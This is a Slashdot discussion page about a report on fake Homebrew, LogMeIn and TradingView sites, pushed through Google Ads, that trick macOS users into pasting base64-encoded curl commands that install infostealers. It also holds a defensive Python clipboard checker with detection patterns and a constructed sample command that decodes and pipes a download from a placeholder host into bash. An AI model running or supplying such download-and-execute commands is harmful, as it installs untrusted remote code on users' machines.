Security OS X Privacy

Fake Homebrew Google Ads Push Malware Onto macOS (bleepingcomputer.com) 20

joshuark shares a report from BleepingComputer: A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. The campaign employs "ClickFix" techniques where targets are tricked into executing commands in Terminal, infecting themselves with malware. Researchers at threat hunting company Hunt.io identified more than 85 domains impersonating the three platforms in this campaign [...].

When checking some of the domains, BleepingComputer discovered that in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results. The malicious sites feature convincing download portals for the fake apps and instruct users to copy a curl command in their Terminal to install them, the researchers say. In other cases, like for TradingView, the malicious commands are presented as a "connection security confirmation step." However, if the user clicks on the 'copy' button, a base64-encoded installation command is delivered to the clipboard instead of the displayed Cloudflare verification ID.
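The clipboard swap described in the summary can be checked for before anything is pasted into Terminal. The following is an added example, not part of the BleepingComputer report or the Slashdot post; the function names, the regex heuristics and the sample strings are constructed for illustration.

```python
import base64
import binascii
import re

# Heuristics chosen for this example (assumptions, not a complete rule set).
RISKY = [
    (re.compile(r"\b(curl|wget)\b[^\n|;]*\|\s*(sudo\s+)?(ba|z)?sh\b"), "download piped to a shell"),
    (re.compile(r"\bbase64\s+(-d|-D|--decode)\b"), "inline base64 decode"),
]
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_layers(text, max_depth=3):
    """Return text plus every printable base64 payload nested inside it."""
    layers, queue = [text], [(text, 0)]
    while queue:
        current, depth = queue.pop()
        if depth >= max_depth:
            continue
        for run in B64_RUN.findall(current):
            try:
                padded = run + "=" * (-len(run) % 4)
                decoded = base64.b64decode(padded, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64 text, e.g. a long identifier
            if decoded.isprintable() or "\n" in decoded:
                layers.append(decoded)
                queue.append((decoded, depth + 1))
    return layers


def inspect_paste(clipboard, displayed=None):
    """List reasons not to paste `clipboard` into Terminal; empty means none found."""
    findings = []
    if displayed is not None and clipboard.strip() != displayed.strip():
        findings.append("clipboard differs from the text shown on the page")
    for index, layer in enumerate(decode_layers(clipboard)):
        where = "plain text" if index == 0 else "base64-decoded layer"
        findings += [f"{label} ({where})" for rx, label in RISKY if rx.search(layer)]
    return findings


# Constructed sample: placeholder URL and ID, not taken from the campaign.
INNER = base64.b64encode(b"curl -fsSL https://example.invalid/install.sh | bash").decode()
SAMPLE_CLIPBOARD = f"echo {INNER} | base64 -d | bash"
SAMPLE_DISPLAYED = "Verification ID: 7f3a-constructed"

if __name__ == "__main__":
    for finding in inspect_paste(SAMPLE_CLIPBOARD, SAMPLE_DISPLAYED):
        print("WARN:", finding)
```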

  • As subject reads, Google is now the root of all that is evil. They've put aside their morals to chase that mighty ad dollar and are willing to advertise for anyone.

  • by Targon ( 17348 ) on Wednesday October 22, 2025 @06:32AM (#65742478)

    Apple keeps pushing the IDEA that MacOS is more secure, but it's like living in a house far from other people and leaving the doors unlocked because you don't think anyone will find your house. So, no antivirus, people don't pay attention to security, and then, they get a bit of malware and freak out because their illusions have been shattered.

    Microsoft on the other hand, has been the big target for malware writers, and yep, Microsoft has been working to improve the security of their operating systems.

    • by twdorris ( 29395 )

      I'm not sure I understand what you're getting at because the weakest link across every OS is the meatbag running the keyboard. This article talks specifically about the delivery mechanism for this involving a dumbass user copying a base64 encoded curl command or some similarly stupid crap and running it. If you give me root because you believe this "security check" is necessary and blindly click OK, then I'm not sure which OS is going to be able to help you out there.

    • Apple keeps pushing the IDEA that MacOS is more secure, but it's like living in a house far from other people and leaving the doors unlocked because you don't think anyone will find your house. So, no antivirus, people don't pay attention to security, and then, they get a bit of malware and freak out because their illusions have been shattered.

      Microsoft on the other hand, has been the big target for malware writers, and yep, Microsoft has been working to improve the security of their operating systems.

      Cool story my man!

      Can you tell me where Apple says you shouldn't use an antivirus program? And that Mac users don't need to enable security?

      And truth is, your hypothetical security free clueless Mac user should be completely pwned if Apple is just as insecure as Windows is, because they don't use virus checkers, and script blocking.

      pssst - we do use security measures, despite the memes. I use several at the same time, for my part.

    • Microsoft on the other hand, has been the big target for malware writers, and yep, Microsoft has been working to improve the security of their operating systems.

      Have they? It looks mostly like they've been working to make their operating systems shittier. I fucking hate 11. When there's a transient network failure I can't even open an explorer window to C:\ to access my backup local copies. I guess a system I cannot use is potentially secure?

    • Tell me you've never even been in the same room with a mac in the past 20 years without telling me. You're simply regurgitating crap you've read on the internet thinking it makes you look smart. Reality check: It doesn't.

      MacOS comes configured by default to allow only software from the app store, or software signed by the developer, to be installed. Like TFA says, you must explicitly run terminal commands to allow installation of unsigned applications. The user has to be tricked into doing this, something

    • Microsoft on the other hand, has been the big target for malware writers, and yep, Microsoft has been working to improve the security of their operating systems.

      Well, it's not like they had a choice, did they? They either improved their security or year there wouldn't be a Windows PC left on the planet that would be able to boot to the desktop.

  • by Mirnotoriety ( 10462951 ) on Wednesday October 22, 2025 @06:48AM (#65742500)
    AMOS’ infection chain and delivery [trendmicro.com]

    ‘The infection begins with the attacker gaining initial access to the system through cracked software downloads, which redirect the victim to AMOS’ landing page. The victim is then prompted to click “Download for MacOS” or instructed to copy and paste malicious commands into the Apple Terminal, which then leads to the execution of a malicious installation script.’
  • FTA: "BleepingComputer discovered that in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results."

    Ghosts of Forbes delivering malware in ads after demanding blockers be turned off. Remind me again why we shouldn't use ad blockers?

  • It sounds like Homebrew is some specific thing. What is it, since the summary never bothers to explain what it is.

    • I haven't used one in a bunch of years (10 or more) but last I looked, Homebrew was a system for installing software.

      If you were to search for "Macintosh Homebrew" I bet the top search result would be what you want. I know Google isn't what it used to be, but you have to do your part. Did everyone move on to prompt engineering for LLMs and just plain forget how to do prompt engineering for search engines?

      • I haven't used one in a bunch of years (10 or more) but last I looked, Homebrew was a system for installing software.

        And it certainly did install software, just not the software the users expected to install.

    • Homebrew is a package manager, similar to using "apt get" on a Linux box you can "brew install" on a Mac. It will take care of updates, getting dependencies and all that kind of thing. Primarily for command line tools like ffmpeg, htop, iperf, macvim (just for some off my list). There is some curation of the "casks" available to "pour" into your homebrew, but just being available via the tool is no promise of security, and you still pass thru the regular macOS gatekeeper so once the signature is known to ap
